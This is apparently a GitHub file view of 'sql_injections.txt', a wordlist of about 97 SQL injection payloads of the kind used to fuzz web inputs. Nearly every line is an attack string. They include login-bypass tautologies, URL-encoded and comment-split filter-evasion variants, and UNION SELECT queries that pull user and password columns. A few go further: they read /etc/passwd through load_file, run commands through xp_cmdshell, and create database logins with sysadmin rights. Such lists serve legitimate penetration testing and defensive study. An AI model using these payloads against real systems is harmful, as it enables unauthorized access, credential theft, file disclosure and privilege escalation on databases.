-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsql_injections.txt
97 lines (97 loc) · 2.25 KB
/
sql_injections.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
`
'
"
;
'#
AND 1=1 --
AND 1=1+--+
'-
AND 1=2--
'/*
' AND '1'='1
||6
'||'6
(||6)
OR 1=1--
' OR '1'='1
; OR '1'='1'
%00' or 1=1 --
%00" or 1=1 --
%27+--+
" OR 1=1--
' OR 1=1/*
or 1=1--
or 1=1--
or 1=1 --
%00or 1=1 --
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
%00' or 'a'='a
%00" or "a"="a
%00') or ('a'='a
%00") or ("a"="a
%27+or+1%3D1+--+
%22+or+1%3D1+--+
%00%27+or+1%3D1+--+
%00%22+or+1%3D1+--+
or+1%3D1+--+
%22+or+%22a%22%3D%22a
%27%29+or+%28%27a%27%3D%27a
%22%29+or+%28%22a%22%3D%22a
1'%20or%20'1'%20=%20'1'))/*
%001'%20or%20'1'%20=%20'1'))/*
1'%20or%20'1'%20=%20'1'))%20--%20
%001'%20or%20'1'%20=%20'1'))%20--%20
1' or '1' = '1')) LIMIT 1/*
1' or '1' = '1')) LIMIT 1/*
1'%20or%20'1'%20=%20'1'))%20--%20
"%20or%201=1%20--%20
'%20or%201=1%20--%20
%27%2520or%25201%3D1%2520--%2520
%00"%20or%201=1%20--%20
%00'%20or%201=1%20--%20
%00%27%2520or%25201%3D1%2520--%2520
NULL OR 1 = 1/*
NULL+OR+1%3D1%2F%2A
NULL OR 'value'='value'/*
NULL%0aOR%0a'value'='value'/*
NULL UNION ALL SELECT user,pass, FROM user_db WHERE user LIKE '%admin%/*
NULL/**/UNION/**/ALL/**/SELECT/**/user,pass,/**/FROM/**/user_db/**/WHERE/**/uid/**/=/*evade*/'1'//
Admin'OR'
' having 1=1--
' OR 'text'=N'text'
' OR 2>1
' OR 'text'>'t'
' union select
Password:*/=1--
' or 1/*
' or 1=1/*
%22+or+isnull%281%2F0%29+%2F*
' group by userid having 1=1--
'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
CREATE USER name IDENTIFIED BY 'pass123'
' union select 1,load_file('/etc/passwd'),1,1,1;
';exec master..xp_cmdshell 'ping 10.10.1.2'--
exec sp_addsrvrolemember 'name', 'sysadmin'
GRANT CONNECT TO name; GRANT RESOURCE TO name;
' union select * from users wheer login = char(114,111,111,116);
'/**/OR/**/1/**/=/**/1
' or 1 in (select@@version)--
' OR 'unusual'='unusual'
' OR 'something' = 'some'+'thing'
' OR 'something' like 'some%'
' OR 'whatever' in ('whatever')
' OR 2 BETWEEN 1 and 3
' or username like char(37);
UNI/**/ON SEL/**/ECT
';EXEC ('SEL'+'ECT US'+'ER')
+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
' and 1 in (select var from temp)--
exec sp_addlogin 'name','password'
@var select @var as var into temp end --
1 UNION SELECT ALL 1,TABLE_NAME,3,4 from sysobjects where xtype=char(85)--
1 UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from EMPLOYEE_NAME --